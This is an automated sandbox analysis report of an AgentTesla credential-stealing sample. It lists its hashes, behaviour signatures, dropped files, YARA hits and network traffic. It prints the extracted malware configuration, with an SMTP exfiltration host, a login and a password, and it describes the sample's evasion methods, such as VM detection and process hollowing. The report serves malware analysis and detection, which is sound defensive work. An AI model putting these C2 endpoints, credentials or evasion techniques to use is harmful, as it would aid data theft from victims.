Play interactive tour

Edit tour

Analysis Report PO13132021.scr

Overview

General Information

Sample Name:	PO13132021.scr (renamed file extension from scr to exe)
Analysis ID:	344901
MD5:	7c4c3a12f367dcd154accce5948ebaeb
SHA1:	b0a7b80ddd9b86a20d3a41e3423cedb341b6220c
SHA256:	1a1e74fbe89bed37913351432c163e204018655e51811aabb9e5fc6a06cf5887
Tags:	AgentTesla
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

PO13132021.exe (PID: 6960 cmdline: 'C:\Users\user\Desktop\PO13132021.exe' MD5: 7C4C3A12F367DCD154ACCCE5948EBAEB)

ioqwel.exe (PID: 6996 cmdline: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s MD5: C56B5F0201A3B3DE53E561FE76912BFD)

tpiyon2.exe (PID: 7028 cmdline: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s MD5: 535DD1329AEF11BF4654B3270F026D5B)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "q8yz7CCwgQfF", "URL: ": "http://8fEo7xWGmGml.org", "To: ": "", "ByHost: ": "polar.argondns.net:587", "Password: ": "dKUidybLVbHYBgI", "From: ": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.587931278.0000000003E01000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.213456226.00000000032F0000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.583608219.0000000000CA6000.00000004.00000020.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.583897205.0000000002812000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000001.209476830.0000000000414000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.583855776.00000000027D0000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: tpiyon2.exe PID: 7028	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: tpiyon2.exe PID: 7028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ioqwel.exe PID: 6996	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.tpiyon2.exe.2810000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.ioqwel.exe.32f0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.tpiyon2.exe.27d0000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.1.tpiyon2.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.tpiyon2.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.ioqwel.exe.32f0000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.tpiyon2.exe.27d0000.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.tpiyon2.exe.400000.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: tpiyon2.exe.7028.2.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "q8yz7CCwgQfF", "URL: ": "http://8fEo7xWGmGml.org", "To: ": "", "ByHost: ": "polar.argondns.net:587", "Password: ": "dKUidybLVbHYBgI", "From: ": ""}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Show sources

Source: PO13132021.exe	Virustotal: Detection: 27%			Perma Link
Source: PO13132021.exe	ReversingLabs: Detection: 28%

Machine Learning detection for sample

Show sources

Source: PO13132021.exe

Joe Sandbox ML: detected

Source: 2.2.tpiyon2.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.1.tpiyon2.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 2.2.tpiyon2.exe.2810000.3.unpack	Avira: Label: TR/Spy.Gen8

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Unpacked PE file: 2.2.tpiyon2.exe.2810000.3.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Unpacked PE file: 2.2.tpiyon2.exe.400000.0.unpack

Uses 32bit PE files

Show sources

Source: PO13132021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: PO13132021.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wntdll.pdbUGP source: ioqwel.exe, 00000001.00000003.208763622.00000000046A0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ioqwel.exe, 00000001.00000003.208763622.00000000046A0000.00000004.00000001.sdmp

Spreading:

Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004059F0
Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_0040659C FindFirstFileA,FindClose,	0_2_0040659C
Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00B1494A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00B1494A
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00404A29 FindFirstFileExW,	2_2_00404A29

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://8fEo7xWGmGml.org

Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.22:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.62:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.53:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.54:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.52:587

Source: Joe Sandbox View

ASN Name: NCONNECT-ASRU NCONNECT-ASRU

Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.22:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.62:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.53:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.54:587
Source: global traffic	TCP traffic: 192.168.2.3:49743 -> 91.210.107.52:587

Source: unknown

DNS traffic detected: queries for: polar.argondns.net

Source: tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tpiyon2.exe, 00000002.00000002.587885686.00000000032E3000.00000004.00000001.sdmp	String found in binary or memory: http://8fEo7xWGmGml.org
Source: tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: PO13132021.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PO13132021.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000000.202042794.0000000000B79000.00000002.00020000.sdmp, tpiyon2.exe, 00000002.00000000.205351945.00000000004C9000.00000002.00020000.sdmp, ioqwel.exe.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	String found in binary or memory: http://zztVNZ.com
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: ioqwel.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: ioqwel.exe, 00000001.00000002.213456226.00000000032F0000.00000004.00000001.sdmp, tpiyon2.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\PO13132021.exe

Code function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040548D

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AB2714 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

1_2_00AB2714

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B3D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_00B3D164

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 2.2.tpiyon2.exe.2810000.3.unpack, u003cPrivateImplementationDetailsu003eu007b193D09A3u002dA1F0u002d4601u002d919Eu002d60E0731A697Du007d/u00388ACD12Au002dB5FCu002d48CAu002d9E59u002d054271CF5702.cs

Large array initialization: .cctor: array initializer size 11931

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00A7B136 NtQuerySystemInformation,		2_2_00A7B136
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00A7B105 NtQuerySystemInformation,		2_2_00A7B105

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B091CF GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,

1_2_00B091CF

Source: C:\Users\user\Desktop\PO13132021.exe

Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403461

Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_00406925	0_2_00406925
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AB1663	1_2_00AB1663
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AD78C3	1_2_00AD78C3
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ABB020	1_2_00ABB020
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AE89BF	1_2_00AE89BF
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AE6A74	1_2_00AE6A74
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ADDBA5	1_2_00ADDBA5
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AC0BE0	1_2_00AC0BE0
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AB9C80	1_2_00AB9C80
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AB94E0	1_2_00AB94E0
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AE9CE5	1_2_00AE9CE5
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ADF409	1_2_00ADF409
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00B38400	1_2_00B38400
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ACD45D	1_2_00ACD45D
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ACDD28	1_2_00ACDD28
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AE6502	1_2_00AE6502
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ADCD51	1_2_00ADCD51
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ABF6A0	1_2_00ABF6A0
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AD16B4	1_2_00AD16B4
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ABE6F0	1_2_00ABE6F0
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ACF628	1_2_00ACF628
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AE265E	1_2_00AE265E
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AE6FE6	1_2_00AE6FE6
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ADBFD6	1_2_00ADBFD6
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_0040A2A5	2_2_0040A2A5
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00495808	2_2_00495808
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00490CD0	2_2_00490CD0
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00491958	2_2_00491958
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00491110	2_2_00491110
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00497618	2_2_00497618
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00493EA0	2_2_00493EA0
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_0049F3E0	2_2_0049F3E0
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00499BE6	2_2_00499BE6
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00495FF8	2_2_00495FF8
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00A72477	2_2_00A72477

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: String function: 00AD8B30 appears 37 times

Source: ioqwel.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ioqwel.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ioqwel.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ioqwel.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ioqwel.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ioqwel.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tpiyon2.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tpiyon2.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tpiyon2.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tpiyon2.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tpiyon2.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tpiyon2.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs PO13132021.exe

Source: PO13132021.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 2.2.tpiyon2.exe.2810000.3.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.tpiyon2.exe.2810000.3.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/5@1/5

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B1A6AD GetLastError,FormatMessageW,

1_2_00B1A6AD

Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_00403461
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00B09399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	1_2_00B09399
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00B08DE9 AdjustTokenPrivileges,CloseHandle,	1_2_00B08DE9
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00A7AFBA AdjustTokenPrivileges,	2_2_00A7AFBA
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00A7AF83 AdjustTokenPrivileges,	2_2_00A7AF83

Source: C:\Users\user\Desktop\PO13132021.exe

Code function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040473E

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B14148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_00B14148

Source: C:\Users\user\Desktop\PO13132021.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B19ED8 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00B19ED8

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Users\user\Desktop\PO13132021.exe

File created: C:\Users\user\AppData\Local\Temp\nstBE1F.tmp

Jump to behavior

Source: PO13132021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PO13132021.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO13132021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: PO13132021.exe	Virustotal: Detection: 27%
Source: PO13132021.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\PO13132021.exe

